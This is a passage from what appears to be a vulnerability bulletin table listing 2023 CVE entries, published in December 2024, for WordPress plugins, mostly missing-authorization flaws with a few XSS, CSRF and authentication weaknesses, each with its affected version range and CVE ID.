Missing Authorization vulnerability in Inqsys Technology Duplicate Post Page Menu & Custom Post Type allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Duplicate Post Page Menu & Custom Post Type: from n/a through 2.4.1. | 2024-12-13 | not yet calculated | CVE-2023-36526 |
| n/a -- n/a |
Missing Authorization vulnerability in FeedbackWP kk Star Ratings allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects kk Star Ratings: from n/a through 5.4.3. | 2024-12-13 | not yet calculated | CVE-2023-36528 |
| n/a -- n/a |
Missing Authorization vulnerability in LiquidPoll LiquidPoll - Advanced Polls for Creators and Brands allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LiquidPoll - Advanced Polls for Creators and Brands: from n/a through 3.3.68. | 2024-12-13 | not yet calculated | CVE-2023-36531 |
| n/a -- n/a |
Missing Authorization vulnerability in Iulia Cazan Image Regenerate & Select Crop allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Image Regenerate & Select Crop: from n/a through 7.1.0. | 2024-12-13 | not yet calculated | CVE-2023-36680 |
| n/a -- n/a |
Missing Authorization vulnerability in Cool Plugins Cryptocurrency Widgets - Price Ticker & Coins List allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Cryptocurrency Widgets - Price Ticker & Coins List: from n/a through 2.6.2. | 2024-12-13 | not yet calculated | CVE-2023-36681 |
| n/a -- n/a |
Missing Authorization vulnerability in WPSchoolPress Team WPSchoolPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPSchoolPress: from n/a through 2.2.7. | 2024-12-13 | not yet calculated | CVE-2023-37887 |
| n/a -- n/a |
Missing Authorization vulnerability in Designinvento DirectoryPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects DirectoryPress: from n/a through 3.6.2. | 2024-12-13 | not yet calculated | CVE-2023-37967 |
| n/a -- n/a |
Missing Authorization vulnerability in The African Boss Checkout with Zelle on Woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Checkout with Zelle on Woocommerce: from n/a through 3.1. | 2024-12-13 | not yet calculated | CVE-2023-37969 |
| n/a -- n/a |
Missing Authorization vulnerability in MultiVendorX WooCommerce Product Stock Alert allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WooCommerce Product Stock Alert: from n/a through 2.0.1. | 2024-12-13 | not yet calculated | CVE-2023-37971 |
| n/a -- n/a |
Missing Authorization vulnerability in ExpressTech Quiz And Survey Master allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Quiz And Survey Master: from n/a through 8.1.10. | 2024-12-13 | not yet calculated | CVE-2023-37984 |
| n/a -- n/a |
Missing Authorization vulnerability in miniOrange YourMembership Single Sign On allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects YourMembership Single Sign On: from n/a through 1.1.3. | 2024-12-13 | not yet calculated | CVE-2023-37987 |
| n/a -- n/a |
Missing Authorization vulnerability in Easyship Easyship WooCommerce Shipping Rates allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easyship WooCommerce Shipping Rates: from n/a through 0.9.0. | 2024-12-13 | not yet calculated | CVE-2023-37989 |
| n/a -- n/a |
Missing Authorization vulnerability in OnTheGoSystems Language allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Language: from n/a through 1.2.1. | 2024-12-13 | not yet calculated | CVE-2023-38383 |
| n/a -- n/a |
Missing Authorization vulnerability in Artbees JupiterX Core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JupiterX Core: from 3.0.0 through 3.3.0. | 2024-12-13 | not yet calculated | CVE-2023-38385 |
| n/a -- n/a |
Missing Authorization vulnerability in RedNao Donations Made Easy - Smart Donations allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Donations Made Easy - Smart Donations: from n/a through 4.0.12. | 2024-12-13 | not yet calculated | CVE-2023-38475 |
| n/a -- n/a |
Missing Authorization vulnerability in Stanislav Kuznetsov QR code MeCard/vCard generator allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects QR code MeCard/vCard generator: from n/a through 1.6.0. | 2024-12-13 | not yet calculated | CVE-2023-38477 |
| n/a -- n/a |
Missing Authorization vulnerability in Codents Simple Googlebot Visit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simple Googlebot Visit: from n/a through 1.2.4. | 2024-12-13 | not yet calculated | CVE-2023-38479 |
| n/a -- n/a |
Missing Authorization vulnerability in Certain Dev Booster Elementor Addons allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Booster Elementor Addons: from n/a through 1.4.9. | 2024-12-13 | not yet calculated | CVE-2023-38480 |
| n/a -- n/a |
Missing Authorization vulnerability in Dylan Blokhuis Instant CSS allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Instant CSS: from n/a through 1.1.4. | 2024-12-13 | not yet calculated | CVE-2023-38483 |
| n/a -- n/a |
Missing Authorization vulnerability in social share pro Social Share Icons & Social Share Buttons allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Social Share Icons & Social Share Buttons: from n/a through 3.5.7. | 2024-12-13 | not yet calculated | CVE-2023-38514 |
| n/a -- n/a |
Missing Authorization vulnerability in YetAnotherStarsRating.com Yet Another Stars Rating allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Yet Another Stars Rating: from n/a through 3.4.3. | 2024-12-13 | not yet calculated | CVE-2023-39305 |
| n/a -- n/a |
Missing Authorization vulnerability in Themeisle Redirection for Contact Form 7 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Redirection for Contact Form 7: from n/a through 2.9.2. | 2024-12-13 | not yet calculated | CVE-2023-39920 |
| n/a -- n/a |
Missing Authorization vulnerability in WP OnlineSupport, Essential Plugin Portfolio and Projects allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Portfolio and Projects: from n/a through 1.3.7. | 2024-12-13 | not yet calculated | CVE-2023-39995 |
| n/a -- n/a |
Missing Authorization vulnerability in WP OnlineSupport, Essential Plugin Accordion and Accordion Slider allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Accordion and Accordion Slider: from n/a through 1.2.4. | 2024-12-13 | not yet calculated | CVE-2023-39996 |
| n/a -- n/a |
Missing Authorization vulnerability in supsystic.com Popup by Supsystic allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Popup by Supsystic: from n/a through 1.10.19. | 2024-12-13 | not yet calculated | CVE-2023-39997 |
| n/a -- n/a |
Missing Authorization vulnerability in SolidWP iThemes Sync allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects iThemes Sync: from n/a through 2.1.13. | 2024-12-13 | not yet calculated | CVE-2023-40001 |
| n/a -- n/a |
Missing Authorization vulnerability in weDevs WP Project Manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Project Manager: from n/a through 2.6.7. | 2024-12-13 | not yet calculated | CVE-2023-40003 |
| n/a -- n/a |
Missing Authorization vulnerability in Easy Digital Downloads Easy Digital Downloads allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Digital Downloads: from n/a through 3.1.5. | 2024-12-13 | not yet calculated | CVE-2023-40005 |
| n/a -- n/a |
Missing Authorization vulnerability in StylemixThemes Cost Calculator Builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Cost Calculator Builder: from n/a through 3.1.42. | 2024-12-13 | not yet calculated | CVE-2023-40011 |
| n/a -- n/a |
Missing Authorization vulnerability in MailMunch MailChimp Forms by MailMunch allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects MailChimp Forms by MailMunch: from n/a through 3.1.4. | 2024-12-13 | not yet calculated | CVE-2023-40203 |
| n/a -- n/a |
Missing Authorization vulnerability in Mateusz Czardybon Justified Gallery allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Justified Gallery: from n/a through 1.7.3. | 2024-12-13 | not yet calculated | CVE-2023-40213 |
| n/a -- n/a |
Missing Authorization vulnerability in bqworks Accordion Slider allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Accordion Slider: from n/a through 1.9.6. | 2024-12-13 | not yet calculated | CVE-2023-40331 |
| n/a -- n/a |
Missing Authorization vulnerability in realmag777 HUSKY allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects HUSKY: from n/a through 1.3.4.2. | 2024-12-13 | not yet calculated | CVE-2023-40334 |
| n/a -- n/a |
Missing Authorization vulnerability in ReviewX Team ReviewX allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ReviewX: from n/a through 1.6.17. | 2024-12-13 | not yet calculated | CVE-2023-40670 |
| n/a -- n/a |
Missing Authorization vulnerability in Lasso Simple URLs allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simple URLs: from n/a through 117. | 2024-12-13 | not yet calculated | CVE-2023-40678 |
| n/a -- n/a |
Missing Authorization vulnerability in Premmerce Premmerce User Roles allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Premmerce User Roles: from n/a through 1.0.12. | 2024-12-13 | not yet calculated | CVE-2023-41130 |
| n/a -- n/a |
Missing Authorization vulnerability in ShapedPlugin LLC Category Slider for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Category Slider for WooCommerce: from n/a through 1.4.15. | 2024-12-13 | not yet calculated | CVE-2023-41132 |
| n/a -- n/a |
Authentication Bypass by Spoofing vulnerability in Michal Novák Secure Admin IP allows Functionality Bypass.This issue affects Secure Admin IP: from n/a through 2.0. | 2024-12-13 | not yet calculated | CVE-2023-41133 |
| n/a -- n/a |
Missing Authorization vulnerability in Ovic Team Ovic Product Bundle allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ovic Product Bundle: from n/a through 1.1.2. | 2024-12-13 | not yet calculated | CVE-2023-41649 |
| n/a -- n/a |
Missing Authorization vulnerability in AlphaBPO Easy Newsletter Signups allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Newsletter Signups: from n/a through 1.0.4. | 2024-12-13 | not yet calculated | CVE-2023-41664 |
| n/a -- n/a |
Missing Authorization vulnerability in Tyche Softwares Abandoned Cart Lite for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Abandoned Cart Lite for WooCommerce: from n/a through 5.16.1. | 2024-12-13 | not yet calculated | CVE-2023-41671 |
| n/a -- n/a |
Missing Authorization vulnerability in Pechenki TelSender allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TelSender: from n/a through 1.14.11. | 2024-12-13 | not yet calculated | CVE-2023-41683 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in ilGhera Woocommerce Support System allows Cross Site Request Forgery.This issue affects Woocommerce Support System: from n/a through 1.2.2. | 2024-12-13 | not yet calculated | CVE-2023-41686 |
| n/a -- n/a |
Missing Authorization vulnerability in Mad Fish Digital Bulk NoIndex & NoFollow Toolkit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Bulk NoIndex & NoFollow Toolkit: from n/a through 1.5. | 2024-12-13 | not yet calculated | CVE-2023-41688 |
| n/a -- n/a |
Missing Authorization vulnerability in Koen Reus Post to Google My Business (Google Business Profile) allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Post to Google My Business (Google Business Profile): from n/a through 3.1.14. | 2024-12-13 | not yet calculated | CVE-2023-41689 |
| n/a -- n/a |
Missing Authorization vulnerability in Wiser Notify WiserNotify Social Proof allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WiserNotify Social Proof: from n/a through 2.5. | 2024-12-13 | not yet calculated | CVE-2023-41690 |
| n/a -- n/a |
Missing Authorization vulnerability in Analytify Analytify allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Analytify: from n/a through 5.1.0. | 2024-12-13 | not yet calculated | CVE-2023-41695 |
| n/a -- n/a |
Missing Authorization vulnerability in Team Heateor Super Socializer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Super Socializer: from n/a through 7.13.54. | 2024-12-13 | not yet calculated | CVE-2023-41802 |
| n/a -- n/a |
Missing Authorization vulnerability in BitPay BitPay Checkout for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BitPay Checkout for WooCommerce: from n/a through 4.1.0. | 2024-12-13 | not yet calculated | CVE-2023-41803 |
| n/a -- n/a |
Missing Authorization vulnerability in Majeed Raza Carousel Slider allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Carousel Slider: from n/a through 2.2.2. | 2024-12-13 | not yet calculated | CVE-2023-41848 |
| n/a -- n/a |
Missing Authorization vulnerability in WP Happy Coders Posts Like Dislike allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Posts Like Dislike: from n/a through 1.1.0. | 2024-12-13 | not yet calculated | CVE-2023-41849 |
| n/a -- n/a |
Missing Authorization vulnerability in ClickToTweet.com Click To Tweet allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Click To Tweet: from n/a through 2.0.14. | 2024-12-13 | not yet calculated | CVE-2023-41857 |
| n/a -- n/a |
Weak Authentication vulnerability in Guido VS Contact Form allows Authentication Abuse.This issue affects VS Contact Form: from n/a through 14.0. | 2024-12-13 | not yet calculated | CVE-2023-41862 |
| n/a -- n/a |
Missing Authorization vulnerability in bqworks Slider Pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Slider Pro: from n/a through 4.8.6. | 2024-12-13 | not yet calculated | CVE-2023-41865 |
| n/a -- n/a |
Missing Authorization vulnerability in Team Plugins360 Automatic YouTube Gallery allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Automatic YouTube Gallery: from n/a through 2.3.3. | 2024-12-13 | not yet calculated | CVE-2023-41866 |
| n/a -- n/a |
Missing Authorization vulnerability in Alex Volkov WP Accessibility Helper (WAH) allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Accessibility Helper (WAH): from n/a through 0.6.2.4. | 2024-12-13 | not yet calculated | CVE-2023-41869 |
| n/a -- n/a |
Missing Authorization vulnerability in Themeum WP Crowdfunding allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Crowdfunding: from n/a through 2.1.5. | 2024-12-13 | not yet calculated | CVE-2023-41870 |
| n/a -- n/a |
Missing Authorization vulnerability in miniOrange SAML SP Single Sign On allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SAML SP Single Sign On: from n/a through 5.0.4. | 2024-12-13 | not yet calculated | CVE-2023-41873 |
| n/a -- n/a |
Missing Authorization vulnerability in wpdirectorykit.com WP Directory Kit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Directory Kit: from n/a through 1.2.6. | 2024-12-13 | not yet calculated | CVE-2023-41875 |
| n/a -- n/a |
Missing Authorization vulnerability in rtCamp rtMedia for WordPress, BuddyPress and bbPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects rtMedia for WordPress, BuddyPress and bbPress: from n/a through 4.6.14. | 2024-12-13 | not yet calculated | CVE-2023-41951 |
| n/a -- n/a |
Missing Authorization vulnerability in Contact Form - WPManageNinja LLC FluentForm allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects FluentForm: from n/a through 5.0.8. | 2024-12-13 | not yet calculated | CVE-2023-41952 |
| n/a -- n/a |
Missing Authorization vulnerability in ProfilePress Membership Team ProfilePress.This issue affects ProfilePress: from n/a through 4.13.1. | 2024-12-09 | not yet calculated | CVE-2023-41953 |
| n/a -- n/a |
Cross Site Scripting vulnerability in Xunrui CMS Public Edition v.4.6.1 allows a remote attacker to execute arbitrary code via the project name function in the project settings tab. | 2024-12-09 | not yet calculated | CVE-2023-43962 |
| n/a -- n/a |
Missing Authorization vulnerability in Inactive Logout Inactive Logout allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Inactive Logout: from n/a through 3.2.2. | 2024-12-13 | not yet calculated | CVE-2023-44142 |
| n/a -- n/a |
Missing Authorization vulnerability in Apasionados Comment Blacklist Updater allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Comment Blacklist Updater: from n/a through 1.1.0. | 2024-12-13 | not yet calculated | CVE-2023-44147 |
| n/a -- n/a |
Missing Authorization vulnerability in BeRocket Brands for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Brands for WooCommerce: from n/a through 3.8.2.2. | 2024-12-13 | not yet calculated | CVE-2023-44149 |
| n/a -- n/a |
Missing Authorization vulnerability in appsbd Mini Cart Drawer For WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Mini Cart Drawer For WooCommerce: from n/a through 4.0.0. | 2024-12-09 | not yet calculated | CVE-2023-47694 |
| n/a -- n/a |
Missing Authorization vulnerability in Artisan Workshop Japanized For WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Japanized For WooCommerce: from n/a through 2.6.4. | 2024-12-09 | not yet calculated | CVE-2023-47698 |
| n/a -- n/a |
Missing Authorization vulnerability in David Vongries Welcome Email Editor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Welcome Email Editor: from n/a through 5.0.6. | 2024-12-09 | not yet calculated | CVE-2023-47756 |
| n/a -- n/a |
Missing Authorization vulnerability in WPDeveloper Essential Blocks for Gutenberg allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Essential Blocks for Gutenberg: from n/a through 4.2.0. | 2024-12-09 | not yet calculated | CVE-2023-47760 |
| n/a -- n/a |
Missing Authorization vulnerability in WPDeveloper Simple 301 Redirects by BetterLinks allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simple 301 Redirects by BetterLinks: from n/a through 2.0.7. | 2024-12-09 | not yet calculated | CVE-2023-47761 |
| n/a -- n/a |
Missing Authorization vulnerability in WPDeveloper BetterDocs allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BetterDocs: from n/a through 2.5.2. | 2024-12-09 | not yet calculated | CVE-2023-47762 |
| n/a -- n/a |
Missing Authorization vulnerability in Martin Gibson WP Custom Admin Interface allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Custom Admin Interface: from n/a through 7.31. | 2024-12-09 | not yet calculated | CVE-2023-47763 |
| n/a -- n/a |
Missing Authorization vulnerability in Metaphor Creations Ditty allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ditty: from n/a through 3.1.24. | 2024-12-09 | not yet calculated | CVE-2023-47764 |
| n/a -- n/a |
Missing Authorization vulnerability in miniOrange miniorange otp verification allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects miniorange otp verification: from n/a through 4.2.1. | 2024-12-09 | not yet calculated | CVE-2023-47776 |
| n/a -- n/a |
Missing Authorization vulnerability in EasyAzon EasyAzon allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects EasyAzon: from n/a through 5.1.0. | 2024-12-09 | not yet calculated | CVE-2023-47780 |
| n/a -- n/a |
Missing Authorization vulnerability in acmethemes Acme Fix Images allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Acme Fix Images: from n/a through 1.0.0. | 2024-12-09 | not yet calculated | CVE-2023-47793 |
| n/a -- n/a |
Missing Authorization vulnerability in Themewinter WPCafe allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPCafe: from n/a through 2.2.22. | 2024-12-09 | not yet calculated | CVE-2023-47805 |
| n/a -- n/a |
Missing Authorization vulnerability in CRUDLab WP Like Button allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Like Button: from n/a through 1.7.0. | 2024-12-09 | not yet calculated | CVE-2023-47820 |
| n/a -- n/a |
Missing Authorization vulnerability in Sonaar Music MP3 Audio Player for Music, Radio & Podcast by Sonaar allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects MP3 Audio Player for Music, Radio & Podcast by Sonaar: from n/a through 4.10. | 2024-12-09 | not yet calculated | CVE-2023-47822 |
| n/a -- n/a |
Missing Authorization vulnerability in nCrafts FormCraft allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects FormCraft: from n/a through 1.2.7. | 2024-12-09 | not yet calculated | CVE-2023-47823 |
| n/a -- n/a |
Missing Authorization vulnerability in NicheAddons Restaurant & Cafe Addon for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Restaurant & Cafe Addon for Elementor: from n/a through 1.5.3. | 2024-12-09 | not yet calculated | CVE-2023-47826 |
| n/a -- n/a |
Missing Authorization vulnerability in Addons for Contact Form 7 Live Preview for Contact Form 7 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Live Preview for Contact Form 7: from n/a through 1.2.0. | 2024-12-09 | not yet calculated | CVE-2023-47830 |
| n/a -- n/a |
Missing Authorization vulnerability in searchiq SearchIQ allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SearchIQ: from n/a through 4.4. | 2024-12-09 | not yet calculated | CVE-2023-47832 |
| n/a -- n/a |
Missing Authorization vulnerability in Prasad Kirpekar WP Meta and Date Remover allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Meta and Date Remover: from n/a through 2.3.0. | 2024-12-09 | not yet calculated | CVE-2023-47836 |
| n/a -- n/a |
Missing Authorization vulnerability in Jules Colle Conditional Fields for Contact Form 7 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Conditional Fields for Contact Form 7: from n/a through 2.4.1. | 2024-12-09 | not yet calculated | CVE-2023-47838 |
| n/a -- n/a |
Missing Authorization vulnerability in Analytify Analytify allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Analytify: from n/a through 5.1.1. | 2024-12-09 | not yet calculated | CVE-2023-47841 |
| n/a -- n/a |
Missing Authorization vulnerability in PayTR Ödeme ve Elektronik Para Kurulusu A.S. PayTR Taksit Tablosu allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PayTR Taksit Tablosu: from n/a through 1.3.1. | 2024-12-09 | not yet calculated | CVE-2023-47847 |
| n/a -- n/a |
Missing Authorization vulnerability in blossomthemes BlossomThemes Email Newsletter allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BlossomThemes Email Newsletter: from n/a through 2.2.4. | 2024-12-09 | not yet calculated | CVE-2023-47849 |
| n/a -- n/a |
Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in gVectors Team wpForo Forum allows Code Injection.This issue affects wpForo Forum: from n/a through 2.2.5. | 2024-12-09 | not yet calculated | CVE-2023-47869 |
| n/a -- n/a |
Missing Authorization vulnerability in IT Path Solutions Contact Form to Any API allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Contact Form to Any API: from n/a through 1.1.6. | 2024-12-09 | not yet calculated | CVE-2023-47871 |
| n/a -- n/a |
Missing Authorization vulnerability in Mondial Relay WooCommerce - WCMultiShipping WCMultiShipping allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WCMultiShipping: from n/a through 2.3.5. | 2024-12-09 | not yet calculated | CVE-2023-48274 |
| n/a -- n/a |
Missing Authorization vulnerability in SuperPWA Super Progressive Web Apps allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Super Progressive Web Apps: from n/a through 2.2.21. | 2024-12-09 | not yet calculated | CVE-2023-48277 |
| n/a -- n/a |
Missing Authorization vulnerability in Tips and Tricks HQ, wptipsntricks Stripe Payments allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Stripe Payments: from n/a through 2.0.79. | 2024-12-09 | not yet calculated | CVE-2023-48286 |
| n/a -- n/a |
Missing Authorization vulnerability in Matat Technologies TextMe SMS allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TextMe SMS: from n/a through 1.9.0. | 2024-12-09 | not yet calculated | CVE-2023-48287 |
| n/a -- n/a |
Missing Authorization vulnerability in Awesome Support Team Awesome Support allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Awesome Support: from n/a through 6.1.4. | 2024-12-09 | not yet calculated | CVE-2023-48324 |
| n/a -- n/a |
Missing Authorization vulnerability in Tech Banker Mail Bank - #1 Mail SMTP Plugin for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Mail Bank - #1 Mail SMTP Plugin for WordPress: from n/a through 4.0.14. | 2024-12-09 | not yet calculated | CVE-2023-48332 |
| n/a -- n/a |
Missing Authorization vulnerability in Easy Social Feed Easy Social Feed allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Social Feed: from n/a through 6.5.1. | 2024-12-09 | not yet calculated | CVE-2023-48740 |
| n/a -- n/a |
Missing Authorization vulnerability in VOID CODERS Void Elementor Post Grid Addon for Elementor Page builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Void Elementor Post Grid Addon for Elementor Page builder: from n/a through 2.1.10. | 2024-12-09 | not yet calculated | CVE-2023-48750 |
| n/a -- n/a |
Missing Authorization vulnerability in Martin Gibson IdeaPush allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects IdeaPush: from n/a through n/a. | 2024-12-09 | not yet calculated | CVE-2023-48774 |
| n/a -- n/a |
Missing Authorization vulnerability in Thomas Scholl canvasio3D Light allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects canvasio3D Light: from n/a through 2.5.0. | 2024-12-09 | not yet calculated | CVE-2023-48776 |
| n/a -- n/a |
Missing Authorization vulnerability in 360 Javascript Viewer 360 Javascript Viewer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects 360 Javascript Viewer: from n/a through 1.7.11. | 2024-12-09 | not yet calculated | CVE-2023-48779 |
| n/a -- n/a |
Missing Authorization vulnerability in Wow-Company Button Generator - easily Button Builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Button Generator - easily Button Builder: from n/a through 2.3.8. | 2024-12-09 | not yet calculated | CVE-2023-49154 |
| n/a -- n/a |
Missing Authorization vulnerability in GoDaddy GoDaddy Email Marketing allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects GoDaddy Email Marketing: from n/a through 1.4.3. | 2024-12-09 | not yet calculated | CVE-2023-49156 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LadiPage LadiApp allows Stored XSS.This issue affects LadiApp: from n/a through 4.4. | 2024-12-09 | not yet calculated | CVE-2023-49158 |
| n/a -- n/a |
Missing Authorization vulnerability in Code4Life Database for CF7 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Database for CF7: from n/a through 1.2.4. | 2024-12-09 | not yet calculated | CVE-2023-49167 |
| n/a -- n/a |
Missing Authorization vulnerability in Clever Widgets Enhanced Text Widget allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Enhanced Text Widget: from n/a through 1.6.3. | 2024-12-09 | not yet calculated | CVE-2023-49192 |
| n/a -- n/a |
Missing Authorization vulnerability in NerdPress Social Pug allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Social Pug: from n/a through 1.30.0. | 2024-12-09 | not yet calculated | CVE-2023-49193 |
| n/a -- n/a |
Insertion of Sensitive Information Into Debugging Code vulnerability in Importify Importify (Dropshipping WooCommerce) allows Retrieve Embedded Sensitive Data.This issue affects Importify (Dropshipping WooCommerce): from n/a through 1.0.4. | 2024-12-09 | not yet calculated | CVE-2023-49194 |
| n/a -- n/a |
Missing Authorization vulnerability in Pagelayer Team PageLayer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PageLayer: from n/a through 1.7.7. | 2024-12-09 | not yet calculated | CVE-2023-49196 |
| n/a -- n/a |
Missing Authorization vulnerability in Yogesh Pawar, Clarion Technologies Bulk Edit Post Titles allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Bulk Edit Post Titles: from n/a through 5.0.0. | 2024-12-09 | not yet calculated | CVE-2023-49754 |
| n/a -- n/a |
Missing Authorization vulnerability in B.M. Rafiul Alam Elementor Timeline Widget allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Elementor Timeline Widget: from n/a through 2.2. | 2024-12-09 | not yet calculated | CVE-2023-49755 |
| n/a -- n/a |
Missing Authorization vulnerability in Themewinter Eventin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Eventin: from n/a through 3.3.52. | 2024-12-09 | not yet calculated | CVE-2023-49756 |
| n/a -- n/a |
Missing Authorization vulnerability in Awesome Support Team Awesome Support allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Awesome Support: from n/a through 6.1.10. | 2024-12-09 | not yet calculated | CVE-2023-49757 |
| n/a -- n/a |
Missing Authorization vulnerability in Veribo, Roland Murg WP Booking System allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Booking System: from n/a through 2.0.19.2. | 2024-12-09 | not yet calculated | CVE-2023-49758 |
| n/a -- n/a |
Missing Authorization vulnerability in heoLixfy Flexible Woocommerce Checkout Field Editor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Flexible Woocommerce Checkout Field Editor: from n/a through 2.0.1. | 2024-12-09 | not yet calculated | CVE-2023-49817 |
| n/a -- n/a |
Missing Authorization vulnerability in Webflow Webflow Pages allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Webflow Pages: from n/a through 1.0.8. | 2024-12-09 | not yet calculated | CVE-2023-49818 |
| n/a -- n/a |
Missing Authorization vulnerability in Metagauss User Registration Forms RegistrationMagic allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects RegistrationMagic: from n/a through 5.2.3.0. | 2024-12-09 | not yet calculated | CVE-2023-49831 |
| n/a -- n/a |
Missing Authorization vulnerability in Paul Ryley Site Reviews allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Site Reviews: from n/a through 6.10.2. | 2024-12-09 | not yet calculated | CVE-2023-49832 |
| n/a -- n/a |
Missing Authorization vulnerability in Metaphor Creations Post Duplicator allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Post Duplicator: from n/a through 2.31. | 2024-12-09 | not yet calculated | CVE-2023-49835 |
| n/a -- n/a |
